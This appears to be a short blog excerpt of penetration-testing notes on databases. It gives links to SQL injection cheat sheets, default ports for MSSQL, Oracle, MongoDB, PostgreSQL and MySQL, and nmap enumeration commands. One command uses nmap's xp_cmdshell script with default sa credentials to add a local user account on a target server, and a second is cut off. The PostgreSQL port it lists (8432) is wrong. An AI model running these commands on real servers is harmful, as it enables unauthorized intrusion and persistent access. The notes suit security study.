1) MSSQL Injection Cheat Sheet | pentestmonkey   2) xp_cmdshell | Red Team tales   3) PentesterMonkey SQL Injection Cheatsheet    Use dbeaver  for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports  Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS)  Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP  MongoDB : 27017,27018,27019/TCP   PostgreSQL: 8432/TCP  MySQL: 3306/TCP  SQL DB Enum with nmap:  nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS  nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add"  nmap -Pn -n -sS —script=ms-sql-xp-cmds...
 
 
Comments
Post a Comment